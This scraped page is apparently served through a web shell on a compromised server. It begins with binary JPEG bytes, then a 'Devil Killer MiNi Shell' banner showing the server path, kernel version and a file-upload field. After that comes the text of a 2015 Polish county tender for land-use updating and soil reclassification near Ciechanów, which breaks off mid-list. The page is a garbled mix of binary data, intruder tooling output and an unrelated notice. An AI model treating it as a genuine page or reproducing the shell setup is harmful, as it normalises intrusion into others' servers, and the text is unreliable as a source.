JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150422/92118-N-2015.html

<p class="kh_header"><b>Ciechanów: AKTUALIZACJA UŻYTKÓW Z PONOWNĄ KLASYFIKACJĄ  UŻYTKÓW ZMIENIONYCH min. W  WYNIKU  ZALESIEŃ ZREALIZOWANYCH W RAMACH PROJEKTU PROW 2007-2013 WRAZ Z OPRACOWANIEM DOKUMENTACJI DLA CELÓW AKTUALIZACJI OPERATU EWIDENCJI GRUNTÓW I BUDYNKÓW DLA CZĘSCI  OBSZARU:
Część A - AKTUALIZACJA UŻYTKÓW : Gm. GLINOJECK:  obręby: SULERZYŻ, OŚCISŁOWO, DZIAŁY, BUDY RUMOCKIE, LIPINY, RUMOKA, BRODY MŁOCKIE.
Część B - ZALESIENIA: Gm. CIECHANÓW, Gm. GLINOJECK, Gm. GRUDUSK, Gm. OJRZEŃ, Gm. SOŃSK - dla 23 działek w 12 obrębach.</b><br>
<b>Numer ogłoszenia: 92118 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ciechanowski , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723485, 6725415, faks 023 6722945.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ciechanow.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AKTUALIZACJA UŻYTKÓW Z PONOWNĄ KLASYFIKACJĄ  UŻYTKÓW ZMIENIONYCH min. W  WYNIKU  ZALESIEŃ ZREALIZOWANYCH W RAMACH PROJEKTU PROW 2007-2013 WRAZ Z OPRACOWANIEM DOKUMENTACJI DLA CELÓW AKTUALIZACJI OPERATU EWIDENCJI GRUNTÓW I BUDYNKÓW DLA CZĘSCI  OBSZARU:
Część A - AKTUALIZACJA UŻYTKÓW : Gm. GLINOJECK:  obręby: SULERZYŻ, OŚCISŁOWO, DZIAŁY, BUDY RUMOCKIE, LIPINY, RUMOKA, BRODY MŁOCKIE.
Część B - ZALESIENIA: Gm. CIECHANÓW, Gm. GLINOJECK, Gm. GRUDUSK, Gm. OJRZEŃ, Gm. SOŃSK - dla 23 działek w 12 obrębach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
AKTUALIZACJA UŻYTKÓW Z PONOWNĄ KLASYFIKACJĄ  UŻYTKÓW ZMIENIONYCH min. W  WYNIKU  ZALESIEŃ ZREALIZOWANYCH W RAMACH PROJEKTU PROW 2007-2013 WRAZ Z OPRACOWANIEM DOKUMENTACJI DLA CELÓW AKTUALIZACJI OPERATU EWIDENCJI GRUNTÓW I BUDYNKÓW DLA CZĘSCI OBSZARU tj:

AKTUALIZACJA UŻYTKÓW: Gm. GLINOJECK:  obręby: SULERZYŻ, OŚCISŁOWO, DZIAŁY, BUDY RUMOCKIE, LIPINY, RUMOKA, BRODY MŁOCKIE.
ZALESIENIA: Gm. CIECHANÓW, Gm. GLINOJECK, Gm. GRUDUSK, Gm. OJRZEŃ, Gm. SOŃSK - dla 23 działek w 12 obrębach.

Część A - AKTUALIZACJA UŻYTKÓW obejmuje:
1)aktualizację  granic użytków gruntowych,
2)wykonanie ponownej klasyfikacji użytków gruntowych zmienionych, w przypadkach gdzie nowo ustalone użytki gruntowe wymagają ponownej klasyfikacji gruntów
3)opracowanie dokumentacji dla celów aktualizacji operatu ewidencji gruntów i budynków wraz z  aktualizacją istniejącej cyfrowej mapy ewidencyjnej  i zintegrowanej z nią części opisowej  uwzględniającej wyniki prac aktualizacyjnych i klasyfikacyjnych  wymienionych w  punktach  A i B.

Szczegółowa charakterystyka obiektu:
Aktualizacja użytków z ponowną  gleboznawczą klasyfikacją gruntów części gm. GLINOJECK - tabela - zał. nr 8
1)Zamawiający zakłada, że zmiany w użytkach nastąpiły głównie w użytkach rolnych  (R, S, Ł, Ps. Br, Wsr, W, Lzr.), gruntach zakrzaczonych i zadrzewionych 
(Lzr), oraz we wszystkich rodzajach gruntów zabudowanych i zurbanizowanych(B, Bp, Bi, Bz, K, dr, T i  inne), a także w gruntach pod wodami (Wp i Ws).
Szacuje się, że powierzchnia tych gruntów wg EGiB wynosi około 1937 ha tj. około 51,2 %   powierzchni obiektu o łącznym obszarze 3784 ha. 
2) Pozostałe 48,8 % powierzchni obrębów to lasy, drogi, inne użytki odzwierciedlone w operacie ewidencji gruntów, w których zakres zmian jest minimalny lub zmiany nie zaszły. Aktualność EGiB dla tego obszaru należy objąć wywiadem, gdy stwierdzono potrzebę zaktualizowania użytków.
3) Podstawowe prace aktualizacyjne zlokalizowane są na określonych w pkt. 1 tj. około 51,2 % powierzchni obiektu. Na podstawie dokonanej analizy wg. dotychczas zaktualizowanych typowych wiejskich obrębów w  gm. Ciechanów  zad.I, Sońsk, Grudusk, Glinojeck, Ojrzeń, Regimin i Ciechanów  zad. II (57 obrębów) prognozuje się, że zmiany dotyczyły około 22,0 % obszaru, z czego około 11,8 - 26,0 % - średnio około 16,8 % aktualizowanego obszaru wymagało ponownej klasyfikacji,
4) Dla obiektu objętego SIWZ szacuje się, że
a) pracami aktualizacyjnymi objętych będzie 1937 ha x 22,0% = 426 ha,
b) pracami klasyfikacyjnymi objętych będzie 1937 ha x 16,8% = 325 ha.

Dane określone w pkt. 1-4 mają charakter szacunkowy i mają  służyć przybliżonemu zorientowaniu się w ilości prac i ich zakresie, co pozwoli oferentom na opracowanie  oferty wg podanych ilości i kosztów własnych jednostki. Zamawiającemu umożliwi to porównanie złożonych ofert.
Brak możliwości precyzyjnego określenia danych w przypadku stwierdzenia różnic na etapie realizacji, nie może być podstawą roszczeń oferenta  z tytułu wzrostu pracochłonności zamówienia, gdyż wynagrodzenie zostanie ustalone wg ilości wykonanych jednostek rzeczowych. Zadanie dotyczy całości prac związanych  z zakresem prac klasyfikacyjnych i aktualizacyjnych, które mogą wystąpić w granicach części aktualizowanych obrębów składających się na zadanie.
Wynagrodzenie za  wykonaną pracę zostanie ustalone jako iloczyn oferowanej ceny jednostkowej i ilości rzeczywiście wykonanych jednostek  rzeczowych aktualizacji z ponowną klasyfikacją liczoną w hektarach, z uwzględnieniem wartościowania prac, w rozbiciu na opisane w SIWZ standardy prac, ustalone zgodnie z zaprezentowanymi w załączniku nr 10 zasadami.
Ponieważ aktualizacja i weryfikacja użytków jest asortymentem prac bardzo złożonym i różnorodnym co do zakresu, Zamawiający na podstawie zdobytych doświadczeń na innych obiektach, zdefiniował cztery standardy prac aktualizacyjnych, szczegółowo opisane  w cz III zał. nr 10, różniące się istotnie pomiędzy sobą zakresem, a zatem i wartością prac. Za modelowy zakres prac  aktualizacyjnych, należy uważać zespół czynności geodezyjno-klasyfikacyjnych opisany szczegółowo jak standard nr 1. Każdy z kolejnych standardów tj. 2, 3 i 4 różni się od standardu nr 1 tym, że albo nie potrzeba wykonywać ponownej klasyfikacji gleboznawczej lub nie ma potrzeby wykonywania pomiaru granicy zmienionego użytku, bowiem albo są dane w bazie LPIS lub są treścią mapy ewidencyjnej, albo obydwóch podstawowych czynności razem, a więc zakres prac jest odpowiednio mniejszy i posiada odpowiednio mniejszą wartość.
Biorąc to pod uwagę Zamawiający zwagował wartość każdego ze standardów odpowiednim współczynnikiem, który będzie wartościował prace aktualizacyjne przy rozliczaniu wartości z Wykonawcą na etapie odbioru końcowego.
Zakres prac - szczegółowo został przedstawiony w zał. nr 10.

Część B - ZALESIENIA, obejmuje:
a) aktualizacja  granic użytków gruntowych wywołanych zalesieniem dokonanym w trybie   ustawy o lasach i Programu Rozwoju Obszarów Wiejskich 2007-2013 w roku 2011 lub z tzw. sukcesji naturalnej.
b) wykonanie ponownej gleboznawczej klasyfikacji gruntów zalesionych,
c) opracowanie dokumentacji dla celów aktualizacji operatu ewidencji gruntów n/w wsi wraz z  aktualizacją istniejącej cyfrowej mapy ewidencyjnej wsi i zintegrowanej z nią części opisowej uwzględniającej wyniki prac aktualizacyjnych i klasyfikacyjnych  wymienionych  w punktach a i b .  
Charakterystyka obiektu.  - wg poniższej tabeli.

CHARAKTERYSTYKA OBIEKTU  - ZALESIENIA
Lp.GMINA OBRĘB Nr dz.
1 CIECHANÓW RAJMUNDOWO	120, 118, 123, MODEŁKA 141/2, MODŁA 379, 340, 359, RYDZEWO 11, 687, 764
2 GLINOJECK KONDRAJEC SZLACHECKI 135/9
3 GRUDUSK GRUDUSK 536
4 OJRZEŃ MŁOCK KOPACZE 93/1, 130, 174, MŁOCK 38, 664
5 SOŃSK GĄSOCIN 1, BIEŃKI KARKUTY 18, MARUSY 270, KOŹNIEWO ŚREDNIE 14, 86, 224, Razem: 5 gmin 12 obrębów 23 działki

Zakres prac dotyczy 23 działek w 12 obrębach o pow. ewidencyjnej 67,94 ha, w których zalesiono 37,86 ha. Wymienione wyżej działki zostały zalesione w całości lub w części.
Załącznikiem do SWIZ szczegółowo opisującym obiekty do aktualizacji w płaszczyźnie własnościowej i przedmiotowej oraz terminów wykonanego zalesienia jest Wykaz gruntów zalesionych w roku 2010 w ramach Programu Rozwoju Obszarów Wiejskich - powiat ciechanowski - zał. nr 9 sporządzany przez Wydział Rolnictwa, Środowiska i Działań Antykryzysowych Starostwa Powiatowego w Ciechanowie, z którego poz. 2 (bez dz. 122), 3, 4, 5, 6, 8, 9, 10, 11, 12, 13, 14, 15, 16 objęte są niniejszym postępowaniem.
Zakres prac - szczegółowo został przedstawiony w zał. nr 11.
Prace należy wykonać z uwzględnieniem:  
a) projektów zalesienia w konkretnych działkach,
b) protokółów udatności.
Powyższe zadanie  wykonywane jest w ramach art. 14 ust. 7 ustawy z dnia 28 września 1991 roku o lasach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1. Zamawiający wymaga wniesienia wadium. w wysokości  2 000,00 zł, słownie: dwa tysiące złotych
12.2. Wadium może być wnoszone w jednej lub kilku następujących formach:
4) pieniądzu;
5) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
6) gwarancjach bankowych;
7) gwarancjach ubezpieczeniowych;
8) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
12.3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy
wskazany przez Zamawiającego w Polskim Banku Spółdzielczym w Ciechanowie: 
32 8213 0008 2001 0005 2663 0007.
Na przelewie bankowym należy wskazać tytuł przedmiotu zamówienia Aktualizacja użytków z ponowną klasyfikacją - G.3037.5.3.4. 2015
12.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
12.5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
12.6. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12.8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12.9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie,  o  którym  mowa  w  art.  26  ust.  3,  z  przyczyn  leżących  po  jego  stronie,  nie  złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa  w  art.  87  ust.  2  pkt  3,  co  powodowało  brak  możliwości  wybrania  oferty  złożonej  przez wykonawcę jako najkorzystniejszej. 
12.10. Zamawiający  zatrzymuje  wadium  wraz  z  odsetkami,  jeżeli  wykonawca,  którego  oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie  umowy  w  sprawie  zamówienia  publicznego  stało  się  niemożliwe  z  przyczyn leżących po stronie wykonawcy.
12.11. Wykonawca do oferty załącza dowód wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art.22 ust. 1 ustawy prawo zamówień publicznych metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co najmniej dwóch usług geodezyjnych w asortymencie aktualizacja użytków z ponowną klasyfikacją gruntów o wartości co najmniej 25  tys. zł. każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w zakresie osób zdolnych do wykonania zamówienia: 
c   w zakresie potencjału technicznego - Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca  będzie dysponował co najmniej jednym zestawem sprzętu geodezyjnego: (dalmierz lub odbiornik GPS, komplet sprzętu do wykonania klasyfikacji, dwoma komputerami z oprogramowaniem .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w zakresie osób zdolnych do wykonania zamówienia: 
a. w zakresie prac geodezyjnych:
- co najmniej trzema osobami z wykształceniem geodezyjnym, w  tym co najmniej dwoma osobami z wykształceniem wyższym, które posiadają  uprawnienia zawodowe nr 1 i 2, z których jednego Wykonawca  wskaże jako odpowiedzialnego za kierowanie pracami geodezyjnymi, nadzór i kontrolę jakości oraz wskaże osoby, które będą świadczyły usługę.
b. w zakresie prac klasyfikacyjnych:
- co najmniej dwoma gleboznawcami-klasyfikatorami, z których każdy w ostatnich trzech latach samodzielnie wykonał co najmniej po 250 ha gleboznawczej klasyfikacji gruntów, z których jednego Wykonawca wskaże jako świadczącego usługę wykonania klasyfikacji i drugą osobę klasyfikatora jako odpowiedzialną za kierowanie pracami, nadzór i kontrolę jakości, którym  Starosta po wyborze Wykonawcy i podpisaniu umowy na  wykonanie będzie mógł udzielić na podstawie § 5 ust 2 Rozporządzenia Rady Ministrów z 12 września 2012 r. w sprawie klasyfikacji gleboznawczej gruntów stosownego upoważnienia do wykonania czynności klasyfikacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50 000,00  zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
